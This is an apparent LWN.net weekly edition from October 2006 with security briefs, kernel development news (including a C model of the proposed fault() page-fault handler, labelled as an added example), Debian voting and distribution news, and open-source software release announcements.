Created: January 5, 2006
Updated: November 30, 2006
Description: xpdf has a number of integer overflows. A remote attacker can
trick a user into opening a maliciously crafted pdf file, allowing the
attacker to execute code with the privileges of the local user. This also
affects the Poppler library, cupsys and tetex-bin.
Comments (none posted)
Resources
Steve Christey at MITRE has done a bunch of statistics crunching on five
years of CVE vulnerability entries. The
resulting report
makes interesting reading. "Format string vulnerabilities appear
more frequently in open source. There are probably several factors. First,
susceptible API library calls such as printf() are easily found in source
code using crude methods, whereas binary reverse engineering techniques are
not conducted by many researchers (this might also be an explanation for
symbolic link issues). Second, many format string problems seem to occur in
rarely-triggered error conditions, which makes them more difficult to test
with black box methods."
Comments (12 posted)
Page editor: Jonathan Corbet
Kernel development
Brief items
The current 2.6 prepatch is 2.6.19-rc1,
released on October 4,
several milliseconds after last week's Kernel Page was published. For a
summary of changes, see
this
article and
this one from
the last two weeks. Highlights include
the parallel ATA driver set,
labeled networking for IPsec
and CIPSO security, a few new architectures, lots of new drivers, the
GFS2 cluster filesystem,
eCryptfs, and large numbers of
internal changes.
The long-format
changelog has the details - but, since we're talking about almost 5000
patches from over 600 contributors, it's best to have a lot of time on
one's hands. The short-form changelog is
somewhat more compact, but still lengthy.
At this point in the process, patches going into the mainline repository
are supposed to be confined to fixes. Many of them are, but Linus has
merged a few other significant changes, including, as predicted, the interrupt handler prototype
change, which has caused changes throughout the tree. There is a new
epoll_pwait() system call which takes an additional signal mask
parameter, and the venerable (but long-unused)
<linux/config.h> include file has been removed at last.
Also merged is the developmental ext4 filesystem, which includes a number of enhancements,
including support for extents and 48-bit block numbers.
See the ext4 documentation file if you are
interested in playing with ext4 (and have good backups).
The current -mm tree is 2.6.19-rc1-mm1. Recent changes
to -mm include the addition of ext4 (which promptly moved on into the
mainline), continued work on the swap token mechanism, a generic
log2() implementation, and the dynamic tick patch.
Comments (3 posted)
Kernel development news
Maintaining drivers out of tree is shameless autoflagellation at
the best of times. We really don't care -- if we didn't make life
hard for them in this way they'd only go and stick pins under their
fingernails to make up for the lack of pain. If you think about it
like that, we're probably doing them a favour -- at least this way
they're _safe_.
-- David Woodhouse
Comments (40 posted)
The
nopfn() VMA operation was added for 2.6.19-rc1; see
this article from last month for
information on this method. It turns out, though, that
nopfn()
might just be one of the shortest-lived kernel API extensions in some time;
Nick Piggin has posted
a series
of patches which will bring significant changes to how page faults are
handled at the lowest levels.
The 2.6.19-rc1 vm_operations_struct structure defines three
methods which handle low-level paging:
struct page *(*nopage)(struct vm_area_struct *area,
unsigned long address, int *type);
unsigned long (*nopfn)(struct vm_area_struct *area,
unsigned long address);
int (*populate)(struct vm_area_struct *area, unsigned long address,
unsigned long len, pgprot_t prot,
unsigned long pgoff, int nonblock);
Ordinarily, page faults are handled by nopfn() (if it exists) or
nopage(). Those functions are supposed to take the given
address and associate it with a page in physical memory. For
virtual memory areas (VMAs) which are backed up by files, the virtual
filesystem layer reacts to a nopage() call by allocating a page of
memory, reading the appropriate contents from backing store, then passing
the page back to the kernel for insertion into the page tables. Device
drivers which implement nopage() typically just translate the
address into an appropriate pointer for an in-memory buffer being
mapped into user space.
Both nopfn() and nopage() assume that the mapping between
virtual memory addresses and the offset within the VMA is linear - that is
why only the address is provided as a parameter. The kernel, however, also
supports nonlinear mappings,
where an application can turn a VMA into a complex window into different
parts of the backing file. The nopfn() and nopage()
methods cannot handle these mappings, since they do not have the required
information. Instead, any backing store which supports nonlinear mappings
must provide a populate() method, which has parameters for both
the virtual memory address and the associated offset
(pgoff) into the backing store device.
Enter Nick, who was working on a tricky race condition found within one of
the most notoriously tricky parts of the kernel: the code which handles
file truncation. In some conditions, a page which was being removed as a
result of a truncate() call could be simultaneously faulted in via
nopage(), leading to memory management confusion. While
rethinking the locking rules for these operations, Nick decided that there
should be a better way. The result was a new VMA operation called
fault():
struct fault_data {
struct vm_area_struct *vma;
unsigned long address;
pgoff_t pgoff;
unsigned int flags;
int type;
};
struct page *(*fault)(struct vm_area_struct *vma,
struct fault_data *fdata);
This method is intended to replace all of nopfn(),
nopage(), and populate(). When a page fault happens, the
kernel fills in the fault_data structure with the needed
information: the user-space address associated with the fault, the
corresponding offset pgoff, and a couple of flags which indicate
whether the fault happened on a write access and whether a nonlinear
mapping is involved.
The fault() function should locate a page which can satisfy a
request for the offset pgoff; it won't normally need
address at all. The function can then either return the
associated struct page, or set the page table entry directly (with
something like vm_insert_page()) and return NULL. Either
way, the type field should be set to the type of fault (major or
minor). If the fault cannot be handled, the appropriate error code should
be put into type instead.
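The description above is the whole contract a driver has to meet, and the detail that matters most for a driver exporting an in-memory buffer is that pgoff, not address, selects the page, and that pgoff can legitimately point past the end of what the driver owns (a VMA's vm_pgoff offsets the window into the buffer). The following added example is a user-space model of that dispatch, not code from Nick's patch or the kernel tree: the kernel types, the VM_FAULT_* values and the flag encoding are stubbed with assumed definitions so the logic compiles and runs stand-alone, and the driver, buffer and VMA are constructed samples. The pgoff arithmetic for the linear case is the kernel's own (vm_pgoff plus the page distance from vm_start); nonlinear mappings, where the core would recover pgoff from the page table entry instead, are outside the model.

```c
/* Added example, not from the kernel: a user-space model of a driver's
 * fault() method under the API described above. Types, constants and the
 * sample driver/VMA below are assumptions made for the model. */
#include <stddef.h>
#include <stdio.h>

#define PAGE_SHIFT 12

/* Stand-ins for kernel types and fault result codes (assumed layouts/values). */
struct page { unsigned long pfn; };
typedef unsigned long pgoff_t;
enum { VM_FAULT_MINOR = 0, VM_FAULT_MAJOR = 1, VM_FAULT_SIGBUS = 2 };

struct vm_area_struct {
    unsigned long vm_start, vm_end;
    pgoff_t vm_pgoff;          /* offset of vm_start into the backing store */
    void *vm_private_data;     /* the driver's buffer */
};

/* The fault_data structure from the patch, as described in the article. */
struct fault_data {
    struct vm_area_struct *vma;
    unsigned long address;
    pgoff_t pgoff;
    unsigned int flags;
    int type;
};

/* An in-memory buffer a driver is willing to map into user space. */
struct drv_buffer {
    struct page *pages;
    size_t npages;
};

/* How the core derives pgoff for a linear VMA: vm_pgoff plus the page
 * distance of the faulting address from vm_start. */
static pgoff_t linear_page_index(const struct vm_area_struct *vma,
                                 unsigned long address)
{
    return vma->vm_pgoff + ((address - vma->vm_start) >> PAGE_SHIFT);
}

/* The driver's fault() method. pgoff selects the page and is bounds-checked
 * against the buffer: a fault whose window extends past the buffer gets
 * SIGBUS instead of whatever memory follows the page array. */
static struct page *drv_fault(struct vm_area_struct *vma,
                              struct fault_data *fdata)
{
    struct drv_buffer *buf = vma->vm_private_data;

    if (fdata->pgoff >= buf->npages) {
        fdata->type = VM_FAULT_SIGBUS;
        return NULL;
    }
    fdata->type = VM_FAULT_MINOR;   /* page already resident: minor fault */
    return &buf->pages[fdata->pgoff];
}

/* Model of the core's side: refuse addresses outside the VMA, fill in
 * fault_data, call the method, hand back the page and the fault type. */
static struct page *do_fault(struct vm_area_struct *vma, unsigned long address,
                             int write, int *type)
{
    if (address < vma->vm_start || address >= vma->vm_end) {
        *type = VM_FAULT_SIGBUS;
        return NULL;
    }
    struct fault_data fd = {
        .vma = vma,
        .address = address,
        .pgoff = linear_page_index(vma, address),
        .flags = write ? 1u : 0u,    /* assumed encoding: bit 0 = write fault */
        .type = 0,
    };
    struct page *pg = drv_fault(vma, &fd);
    *type = fd.type;
    return pg;
}

/* Constructed sample: a 4-page buffer, and a 4-page VMA whose window starts
 * at buffer page 1, so its last page lies beyond the buffer. */
static struct page sample_pages[4] = { {100}, {101}, {102}, {103} };
static struct drv_buffer sample_buf = { sample_pages, 4 };
static struct vm_area_struct sample_vma = {
    .vm_start = 0x10000, .vm_end = 0x14000, .vm_pgoff = 1,
    .vm_private_data = &sample_buf,
};

/* pfn served for a read fault at address, or 0 if no page was returned. */
unsigned long fault_pfn(unsigned long address)
{
    int type;
    struct page *pg = do_fault(&sample_vma, address, 0, &type);
    return pg ? pg->pfn : 0;
}

/* Fault type recorded for a read fault at address. */
int fault_type(unsigned long address)
{
    int type;
    do_fault(&sample_vma, address, 0, &type);
    return type;
}

int main(void)
{
    printf("0x11004 -> pfn %lu, type %d\n", fault_pfn(0x11004), fault_type(0x11004));
    printf("0x13000 -> pfn %lu, type %d (SIGBUS=%d)\n",
           fault_pfn(0x13000), fault_type(0x13000), VM_FAULT_SIGBUS);
    return 0;
}
```

The second lookup is the case to notice: 0x13000 is inside the VMA, yet its pgoff (4) is past the buffer, so a handler that indexed its page array without the check would return memory it does not own.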
Nick's patch gets rid of the nopfn() and populate()
methods immediately. There is currently only one user of nopfn(),
and the older populate() API has never been widely used outside of
the mainline kernel. The install_page() function is also destined
for a near-term demise. The nopage() method, instead, is widely
used by device drivers, inside and outside of the mainline. So it has been
marked as deprecated and scheduled for removal one year from now, in
October, 2007. There have been suggestions that nopage() should
go sooner (after six months, say), but no definitive decision.
Details like that aside, there appears to be broad support for this
change. These patches would probably be a bit too new for 2.6.19, even if
the merge window were still open, so 2.6.20 is the earliest likely date for
them to appear in the mainline. But, at that point, driver and out-of-tree
filesystem maintainers will have some updating to do.
Comments (1 posted)
| October 4, 2006 |
| This article was contributed by Paul McKenney |
Classic RCU requires that read-side critical sections obey the same rules
obeyed by the critical sections of pure spinlocks: blocking or sleeping
of any sort is strictly prohibited.
This has frequently been an obstacle to the use of RCU, and
I have received numerous requests for a ``sleepable RCU'' (SRCU) that
permits arbitrary sleeping (or blocking) within RCU read-side critical
sections.
I had previously rejected all such requests as unworkable, since arbitrary
sleeping in RCU read-side could indefinitely extend grace periods, which
in turn could result in arbitrarily large amounts of memory awaiting the
end of a grace period, which finally would result in system hangs due
to memory exhaustion.
After all, any concurrency-control primitive that could result in
system hangs -- even when used correctly -- does not deserve to exist.
However, the realtime kernels that require spinlock critical sections
be preemptible [3] also require that RCU read-side critical
sections be preemptible [2].
Preemptible critical sections in turn require that lock-acquisition
primitives block in order to avoid deadlock,
which in turn means that both RCU's and spinlocks'
critical sections must be able to block awaiting a lock.
However, these two forms of sleeping have the special property that
priority boosting and priority inheritance may be used to awaken
the sleeping tasks in short order.
Nevertheless,
use of RCU in realtime kernels was the first crack in the tablets
of stone on which were inscribed ``RCU read-side critical sections can never
sleep''.
That said, indefinite sleeping, such as blocking waiting for an
incoming TCP connection, is strictly verboten even in realtime kernels.
Quick Quiz 1: Why is sleeping prohibited within Classic RCU read-side
critical sections?
Quick Quiz 2:
Why not permit sleeping in Classic RCU read-side critical sections
by eliminating context switch as a quiescent state, leaving user-mode
execution and idle loop as the remaining quiescent states?
(Click below for the rest of this lengthy, technical article - and the
answers to the quick quiz questions).
Full Story (comments: 10)
Your editor has recently had the opportunity to write a Linux driver for a
camera device - the camera which will be packaged with the One Laptop Per
Child system, in particular. This driver works with the internal kernel
API designed for such purposes: the Video4Linux2 API. In the process of
writing this code, your editor made the shocking discovery that, in fact,
this API is not particularly well documented - though the user-space side
is, instead,
quite
well documented indeed. In an attempt to remedy the
situation somewhat, LWN will, over the coming months, publish a series of
articles describing how to write drivers for the V4L2 interface.
V4L2 has a long history - the first gleam came into Bill Dirks's eye back
around August of 1998. Development proceeded for years, and the V4L2 API
was finally merged into the mainline in November, 2002, when 2.5.46 was released. To this
day, however, quite a few Linux drivers do not support the newer API; the
conversion process is an ongoing task. Meanwhile, the V4L2 API continues
to evolve, with some major changes being made in 2.6.18. Applications
which work with V4L2 remain relatively scarce.
V4L2 is designed to support a wide variety of devices, only some of which
are truly "video" in nature:
- The video capture interface grabs video data from a tuner or
camera device. For many, video capture will be the primary
application for V4L2. Since your editor's experience is strongest in
this area, this series will tend to emphasize the capture API, but
there is more to V4L2 than that.
- The video output interface allows applications to drive
peripherals which can provide video images - perhaps in the form of a
television signal - outside of the computer.
- A variant of the capture interface can be found in the video
overlay interface, whose job is to facilitate the direct display
of video data from a capture device. Video data moves directly from
the capture device to the display, without passing through the
system's CPU.
- The VBI interfaces provide access to data transmitted during
the video blanking interval. There are two of them, the "raw" and
"sliced" interfaces, which differ in the amount of processing of the
VBI data performed in hardware.
- The radio interface provides access to audio streams from AM
and FM tuner devices.
Other types of devices are possible. The V4L2 API has some stubs for
"codec" and "effect" devices, both of which perform transformations on
video data streams. Those areas have not yet been completely specified,
however, much less implemented. There are also the "teletext" and "radio
data system" interfaces currently implemented in the older V4L1 API; those
have not been moved to V4L2 and there do not appear to be any immediate
plans to do so.
Video devices differ from many others in the vast number of ways in which
they can be configured. As a result, much of a V4L2 driver implements code
which enables applications to discover a given device's capabilities and to
configure that device to operate in the desired manner. The V4L2 API
defines several dozen callbacks for the configuration of parameters like
tuner frequencies, windowing and cropping, frame rates, video compression,
image parameters (brightness, contrast, ...), video standards, video
formats, etc. Much of this series will be devoted to looking at how this
configuration process happens.
Then, there is the small task of actually performing I/O at video rates in
an efficient manner. The V4L2 API defines three different ways of moving
video data between user space and the peripheral, some of which can be on
the complex side. Separate articles will look at video I/O and the
video-buf layer which has been provided to handle common tasks.
Subsequent articles will appear every few weeks, and will be added to the
list below:
Comments (6 posted)
Patches and updates
Kernel trees
Core kernel code
Development tools
Device drivers
Documentation
Filesystems and block I/O
Memory management
Networking
Security-related
Miscellaneous
Page editor: Jonathan Corbet
Distributions
News and Editorials
Debian developers have no fewer than four issues to vote on this week. The
voting period for all of them closes at the end of the day, October 14,
2006. Hopefully these issues will soon be resolved, but we cannot be
certain, because "further discussion" is an option on all of the ballots.
The General Resolution to clarify the scope and applicability of item 2 of
the Debian free software guidelines (DFSG) has gotten a second call for votes. The full text of this
resolution contains all the nitty gritty details, but basically this
one says that the DFSG applies to firmware as well as software.
The next GR (call for votes / full text) covers the
handling of source-less firmware in the Linux kernel. While progress has
been made since the Sarge release in terms of removing source-less/non-free
firmware from the main archive, there is still enough that it comes down to
a choice between removing all of it or releasing Etch on schedule. Since
it will not be possible to do both, this GR provides for the release of
Etch even with kernel firmware issues, or it could grant a special
exception to DFSG2 for firmware as long as required.
Those two votes are intertwined. If it is determined that the DFSG2 has a
narrow focus there will be fewer firmware issues to deal with. Even if the
DFSG2 is given a broad interpretation, the second GR makes it possible to
release Etch on schedule.
The next two GRs are also intertwined. In light of the Dunc-tank
controversy the Debian developers may now vote to recall the project leader or reaffirm support for the project leader.
Anthony Towns has released a caretaking
memo, delegating his DPL duties to various people at least until a decision
is reached. Presumably these people will continue on in case of a recall,
until a new leader is elected.
Once these issues are resolved we can get back to the Bug Squashing
Marathon, currently in progress.
Comments (1 posted)
New Releases
openSUSE 10.2 Alpha5 is out. "We only have DVDs for i386 and x86-64
this time. They are available via ftp.opensuse.org and its mirrors.
Mini-ISOs for remote installation are available as well. So, there are
neither CDs nor deltas."
Full Story (comments: none)
Distribution News
The release date for Fedora Core 6 has been pushed back to
October 17. It seems that there are a few troublesome problems
needing to be fixed before the Fedora developers are ready to send this
release out into the wild. "Your extra careful testing of rawhide
over the next few days would greatly be appreciated."
Full Story (comments: 8)
Mandriva is mobilizing its network of Linux User Groups (LUGs) to
coordinate a worldwide Installfest on October 21 2006.
"Installations of Mandriva Linux One and Free will take place all
around the world, thanks to the Linux community. Major participating
locations will include the United States, China, Poland, Argentina and
France. Last year, Mandriva install fests gathered more than 1,500
participants in more than 60 cities in 20 countries such as the United
States, Argentina, China and Morocco. This major event was covered on TV,
radio and in the press."
Full Story (comments: none)
The release candidate freeze for Ubuntu 6.10 should be in effect now.
"During this time, uploads should be made only for changes which are
critical for the release, and must be approved by the release team. As we
work to prepare the release, further information about these restrictions
may be announced."
Full Story (comments: none)
It seems that there are too many known release-critical bugs in the etch
distribution, scheduled to be released by the end of this year. So the
full freeze of this distribution will be delayed for an unspecified (but
intended to be short) period of time: "We haven't chosen a date yet, but
you can still expect it to happen in October or early November."
Full Story (comments: 6)
The next Debian bug squashing party will be in Munich on October 13 - 15,
2006.
Full Story (comments: none)
Distribution Newsletters
The Fedora Weekly News covers Fedora Core 6 release date slip, FC6 Pre-release
(Test4), Ohio Linux Fest 2006 Summary, One Laptop Update, Red Hat KDE
conference talk, High-tech social enterprise reaps free software's
benefits, and other topics.
Comments (none posted)
The Gentoo Weekly Newsletter for October 2, 2006 covers the availability of Gentoo
2006.1 at the Gentoo Store, openoffice.org template/clipart competition,
LinuxParty.sk pictures and several other topics.
Comments (none posted)
The Ubuntu Weekly Newsletter for September 30, 2006 covers the beta release
of Ubuntu/Kubuntu 6.10, a report from Akademy 2006, a winning entry for a
poster design competition, Universe Version Freeze, and more.
Full Story (comments: none)
The DistroWatch Weekly for October 9, 2006. "With the release of Mandriva Linux
2007 last week it would seem that the once highly popular desktop Linux
distribution has finally closed a shaky chapter behind itself and decided
to return to what it does best - proudly produce a great desktop Linux
system for the world. This issue of DistroWatch Weekly focuses on Mandriva
Linux, its recent past and new products. But Mandriva 2007 wasn't the only
major distribution release last week; the fans of Slackware Linux also had
a reason to celebrate as version 11.0 of the world's oldest surviving Linux
distribution finally hit the download mirrors, promptly followed by a
number of Slackware derivatives for all kinds of purposes and processor
architectures. Also in this issue: we'll take a quick look at the new
VectorLinux 5.8, summarise the week in the troubled world of Debian
GNU/Linux, and point our readers to a good comparison between openSUSE and
SUSE Linux Enterprise Desktop."
Comments (none posted)
Package updates
Updates for Fedora Core 5: frysk (new upstream version), compat-gcc-32 (bug
fixes), xsane (bug fix), perl-Archive-Tar (upstream version 1.30), tar (bug
fix), tzdata (upstream version 2006m).
Comments (none posted)
Updates for Mandriva Linux 2007.0 and Corporate Server 4.0: cups (bug fixes).
Updates for Mandriva Linux 2006.0: glibc (bug fixes).
Comments (none posted)
Updates for rPath Linux 1: conary, conary-build, conary-repository, epdb
(Conary 1.0.33 maintenance release), ntp (bug fixes), spamassassin (updated),
SDL (improved arts support), dovecot, am-utils, krb5, krb5-workstation,
krb5-services, krb5-server, krb5-test, mysql, mysql-server, mysql-bench,
postgresql, postgresql-server, vsftpd, ypserv, microcode_ctl, httpd,
mod_ssl, nfs-utils (start services by default unless they are currently
disabled).
Comments (none posted)
Updates for Ubuntu 6.06 LTS: readahead-list 1:0.20050517.0220-0ubuntu5~dapper1,
cpio 2.6-10ubuntu0.2, cupsys 1.2.2-0ubuntu0.6.06.1, hal 0.5.7-1ubuntu18.1,
apt-mirror 0.4.4-4ubuntu1~dapper1, brasero 0.4.4-0ubuntu1~dapper1. There are
also 94 language pack updates available which have not been processed due to
time constraints.
Comments (none posted)
Newsletters and articles of interest
DesktopLinux covers the release of Foresight 0.9.8.2. "Foresight Linux, the
distribution for those who like living on GNOME's cutting edge, has just been
updated. One of the distro's lead developers, Antonio Meireles, announced
this week that the latest Foresight 0.9.8.2 is now available. The release
includes "the usual bug fixes and package updates, including the latest
stable gnome (2.16.1) package set and the latest Google Earth release, a
revamped X.org subsystem and a new default kernel (2.16.18)," according to
Meireles."
Comments (none posted)
Linux.com covers Debian's Iceweasel browser. "Debian plans to release its newest
version, Etch, in December, and wants Mozilla's Firefox Web browser to be
part of the distribution. Mozilla, however, told Debian it couldn't release
the software without its accompanying artwork. Now a legal expert says that
the existing distinctions between copyright and trademark laws should have
prevented this from becoming an issue in the first place."
Comments (none posted)
Debian Admin looks at installing rpm files with alien. "Some time you might
find some applications are having only .rpm files but you want a .deb package
for your Debian, Ubuntu and other Debian derived distributions. If you can't
find .deb debian package in any of the debian, ubuntu repositories or
elsewhere, you can use the alien package converter to install the .rpm
file."
Comments (1 posted)
Dave Chappelle looks at Novell SUSE Linux 10 Enterprise Desktop. "Novell CTO Ross Chevalier
is traveling the continent giving demonstrations of Novell SUSE Linux 10
Enterprise Desktop. When Novell decided to deliver its version of the best
operating system, it first had to learn what users wanted in an OS. To
accomplish that objective, Novell started betterdesktop.org."
Comments (none posted)
DesktopLinux picks three favorite easy-to-use "Windows replacement" Linux
distributions. "There are many users, some with far less experience than he has, who
are sick to death of Windows and the constant need to keep it, and
third-party security software, up to date to even have a chance of having a
healthy PC. But, at the same time, many of these users aren't interested
in learning Linux. They just want an operating system that will let them
get email, browse the Web, and run a few simple office
applications." Their top three:
MEPIS Linux,
Xandros Linux and
Freespire.
Comments (none posted)
Distribution reviews
DesktopLinux takes a look at easys GNU/Linux version 3.0. "Marcus Moeller has announced the release of version 3.0 of
Easys GNU/Linux (formerly PocketLinux), a single-CD Slackware-based
distro. The new release boasts a 2.6.17.13 Linux kernel and "full" KDE
3.5.4 desktop instead of the "KDE light" supplied in prior
versions."
Comments (none posted)
Linux-Watch takes a look at UbuntuCE, Ichthux and other Christian-themed
distributions. "Six years ago, there was a hoax Linux: Jesux, the Linux
distribution for Christians. That was a joke. Today, it's real. In fact,
there are several Christian Linuxes. Perhaps the most well-known of these
is UbuntuCE (Christian Edition), which is built on top of Ubuntu 6.06.1
LTS."
Comments (1 posted)
eWeek reviews Mandriva Corporate Server 4. "Mandriva's Mandriva Corporate Server 4
is a decent Linux server operating system that we found somewhat marred by
a virtualization technology reach that exceeds its grasp--CS 4's advertised
inclusion of VMware's VMware, OpenVZ and Xen didn't meet our
expectations. We're all for broadened server application deployment
options, but CS 4 could use more integration work."
Comments (none posted)
Linux.com reviews Turbolinux 11 "Fuji". "Turbolinux has been around since
1992. Everyone knows about this commercial distro, but for some reason it
never became as popular as SUSE or Mandriva. Turbolinux 11, code-named
"Fuji," was released recently and I decided it was time to see if
Turbolinux measures up to other Linux distros. The Fuji release has some
interesting features, but I found the release to be a disappointment
overall."
Comments (none posted)
Page editor: Rebecca Sobol
Development
October 10, 2006
This article was contributed by Tom Chance.
KOffice has seen a huge surge in exciting feature development in the past year, putting it in the same league as free software giants such as OpenOffice.org and The GIMP, and even surpassing them in places. With version 1.6 due out this Sunday (October 15) it's timely that
Krita,
KOffice's painting application, is now leading an effort to develop a
fairly boring feature, an open graphics file format.
Boring, but potentially very useful. In the first place we currently only have The GIMP's
XCF format,
which fulfills some of the needs shared by free raster graphics applications but effectively serializes the internal structures of the application in one binary blob. Then there is
TIFF, a format so horrendously complicated and unstandardized that nobody seems to want to fully implement it. Having a format that caters for everybody's needs, and that allows raster graphics to be exchanged between applications, is obviously a good thing.
While there was some controversy surrounding the decision to make yet another format, rather than using the XCF2 specification under development, some GIMP developers have begun working on OpenRaster. It is now being drafted within the CREATE initiative, part of freedesktop.org. Inge Wallin, KOffice's marketing lead, told LWN that they also plan to invite Adobe
and Corel to collaborate on the specification.
The second major strength of OpenRaster is that it fits nicely into the OpenDocument craze, adding raster graphics to the range of document types already supported. OpenDocument gives developers a lot of their needs for free, such as wrapping up metadata, settings and bitmaps in XML. At aKademy, the KDE community's annual developer conference, the KOffice developers got a chance to discuss lessons they can learn from
SVG
with a member of the audience who happened, according to Wallin, to be something of an expert on the subject. SVG, of course, already implements similar features in XML and is well-structured. Using OpenDocument as a basis means a lot of the technical work is
already done for them.
But more importantly, by piggybacking on the initiative of OpenDocument in government and industry circles, OpenRaster will gain a far wider exposure than any format that was developed primarily within the free software community. The OpenDocument movement also wins in three ways. First it gains a proper raster format. Second, this format demonstrates the flexibility and extensibility of the specifications. Finally, because the effort is being led by KOffice developers, with collaboration from The GIMP developers amongst others, it helps overcome the impression that OpenDocument is basically OpenOffice.org's document format suite, rather than a range of well supported exchange formats.
In fact, OpenDocument has been the default file format for KOffice since the release of version 1.5 in April, 2006. The office suite has been developing much faster than OpenOffice.org, and KFormula sports the most complete implementation of OpenDocument and MathML thanks to a Google Summer of Code project.
It's not just graphics where KOffice is breaking new ground, either. The developers of Kexi, a free competitor for Microsoft Access, Filemaker and Oracle Forms, told LWN that they are in the early
stages of developing an OpenDocument specification for databases. The rough plan is to develop an XML exchange format that may be agnostic about the storage layer, or may use a widely supported technology such as SQLite.
So what does the future hold? According to Boudewijn Rempt, who is leading the OpenRaster initiative, the first complete specification should be released in a couple of months. Once that is more or less ready, the Krita developers will start implementing it. If KDE 4 is out in time, and all goes according to plan with KOffice 2, the format may be the default in Krita 2. Otherwise it will remain a reference implementation, awaiting full integration after Krita 2.0 is released.
As for its status as an OpenDocument format, version 1.1 of the ODF specification has just come out. Version 1.2, which will be put through the ISO process again, is expected in early 2008, so it is hoped that OpenRaster and perhaps even the database format can be part of the specification by then. Artists will have good reason to expect developers to implement support in major free applications if it does, and we may even see the industry giants coming on board within that timescale. OpenDocument moves one step closer to format predominance.
Comments (1 posted)
System Applications
Audio Projects
Version 0.102.20 of the JACK audio connection kit is out.
"Now with experimental MIDI support!" See the release notes for more details.
Comments (none posted)
Database Software
Version 5.0.26 of the MySQL DBMS is available.
"
This is a bugfix release for the current production release family."
Full Story (comments: none)
Version 3.3.8 of SQLite, a lightweight DBMS, is available.
"Version 3.3.8 adds support for full-text search using the FTS1 module. There are also minor bug fixes. Upgrade only if you want to try out the new full-text search capabilities or if you are having problems with 3.3.7."
Comments (none posted)
LDAP Software
The Apache Software Foundation has
announced the availability of ApacheDS 1.0, a Java-based embeddable
LDAP server.
"
Aiming to build an enterprise directory server platform, the Apache
Directory Project created ApacheDS 1.0 as an LDAPv3 server with the ability
to plug in other protocol modules. ApacheDS 1.0 contains other Internet
protocol services such as DNS, DHCP, Change Password, and Kerberos, which
store their records within a common store and allow access to that data
through LDAP. ApacheDS 1.0 enables the pluggable services to back their
data within the Apache Directory Server's backing stores without any
network latency or going through the LDAP line protocol."
Comments (none posted)
Libraries
Version 1.1 RC1 of libX11 has been announced.
"
This release includes the Xlib/XCB work, which uses XCB as the Xlib
transport layer, and allows a client to use both Xlib and XCB on the
same connection. This allows clients to transition from Xlib to XCB
incrementally."
Full Story (comments: 3)
Release candidate 2 of XCB 1.0 (xcb-proto and libxcb) is out.
"
We have provided this second candidate release to allow for more widespread
review and testing before XCB 1.0. As of version 1.0, libxcb will
provide a stable API and ABI; future changes will consist only of
additions, and applications compiled against XCB 1.0 or newer will work
with all future versions of XCB. Barring discovery of serious issues
with the API, we do not anticipate any API changes between this release
and the 1.0 release.
We would greatly appreciate API review in this final release candidate period."
Full Story (comments: none)
Mail Software
Version 3.1.6 of the Apache SpamAssassin email filter is available.
"
3.1.6 includes a large number of bug fixes and documentation updates."
Full Story (comments: none)
Version 3.1.7 of Apache SpamAssassin has been announced.
"
3.1.7 is a "quick-fix" release; it contains only a fix for one bug,
introduced accidentally in 3.1.6".
Full Story (comments: none)
Networking Tools
Version 1.2.3r2 of bartlby is out with minor improvements.
"Bartlby is a network and system monitor, completely written in C, to provide a scalable framework with the ability to monitor networks of various sizes. It consists of a core daemon, several plugins, and a Web GUI (PHP extension). The core daemon checks (over active/passive TCP) services/hosts and notifies users in case of critical service conditions (mail, SMS, ICQ, and custom triggers are supported). Bartlby provides an open plugin interface to give every administrator an easy to use option to extend the plugin base, and a fully customizable GUI (written in PHP using a C extension). Nearly everything can be controlled via an XML interface."
Comments (none posted)
Printing
Version 0.0.3 of JASmine, a page accounting system for the CUPS
print system, is out.
"Released on October 3, 2006, it features server stats, bug corrections and many improvements. Read the release notes."
Comments (none posted)
Security
Version 1.9.92 of GnuPG, a free implementation of the OpenPGP standard,
is out.
"
We are pleased to announce the availability of GnuPG 1.9.92 - one of
the last steps towards a 2.0 release. The 1.9 branch of GnuPG
features the OpenPGP as well as the S/MIME protocol. You should
consider using GnuPG 1.9 if you want to use S/MIME. The included
GPG-AGENT is also helpful when using the stable GPG version 1.4 or if
you want to use its ssh-agent replacement feature (including smart
card support).
Note that this version is still in beta state. The final release of
GnuPG 2.0 is scheduled for November."
Full Story (comments: none)
Web Site Development
Version 1.0.0 of Featured Photo
is out.
"
Featured Photo is a module that allows you to display "featured photos" on the homepage of your phpWebSite. This release requires phpWebSite 1.0.x.
The new 1.0.0 release was completely rewritten for phpWebSite 1.0.x. Because of this, compatibility with phpWebSite 0.10.x was lost. (0.10.x users can still download Featured Photo 0.4.0).
New in this release is the ability to add photo blocks to more than just the homepage. Each page could have its own featured photo. In addition, "click to enlarge" is finally implemented."
Comments (none posted)
Version 1.8 beta 2 of the Midgard content management system is
available.
"
The Midgard Project has released the second
beta release version for the upcoming 1.8 stable branch of the
Midgard Open Source Content Management System.
Midgard's 1.8 branch focuses on improved stability for Midgard2 technology
preview features introduced in 1.7 branch."
Full Story (comments: none)
The Apache Software Foundation has
announced the release of the Struts 2.0.1 development build.
"
Formerly known as WebWork 2, Struts 2 was created after the independent
developer community, WebWork, and the Apache Struts Project joined forces
in December 2005.
Building on the success of Struts 1, the de-facto Open Source standard
framework for creating Java-based Web applications, Struts 2 bridges
existing standards to easily create and maintain enterprise-grade
applications."
Comments (none posted)
Desktop Applications
Audio Applications
Version 2.0 beta 5 of Ardour, a multi-track audio editor,
has been announced.
"
This release features a huge number of improvements and fixes since the last beta."
Comments (none posted)
Calendar Software
Version 0.3 of Mozilla Sunbird and Lightning has been announced.
"
The Mozilla Calendar Project is pleased to announce the release of
Sunbird and Lightning 0.3.
Thanks to the hard work of our localizers, both Sunbird and Lightning
are available immediately in 17 different locales."
Full Story (comments: none)
Desktop Environments
Version 2.16.1 of the GNOME desktop environment has been released.
"
This is the first
release in a series of point releases for the 2.16 branch.
Come and see all the bug fixing, all the new translations and all the
updated documentation brought to you by the wonderful team of GNOME
contributors! While development has started on the GNOME 2.17/2.18
road, work on the stable branch continues to make it even more solid."
Full Story (comments: none)
Version 2.16.1 of GARNOME, the bleeding-edge GNOME distribution, is out.
"
This release
incorporates the GNOME 2.16.1 Desktop and Developer Platform, fine-tuned
and updated with love by the GARNOME Team.
As usual it includes updates and fixes after the official GNOME freeze,
together with a host of third-party GNOME packages, Bindings and the
Mono(tm) Platform -- this is the second release of the current stable
GNOME branch, ironing out yet-more bugs, hopefully adding yet-more
stability and ships with the latest and greatest stable releases."
Full Story (comments: none)
The following new GNOME software has been announced this week:
You can find more new GNOME software releases at
gnomefiles.org.
Comments (none posted)
KDE 3.5.5 is out. This is a maintenance release, but it also includes an
upgraded version of Kopete, various improvements to KHTML, and some
additional translations.
Full Story (comments: none)
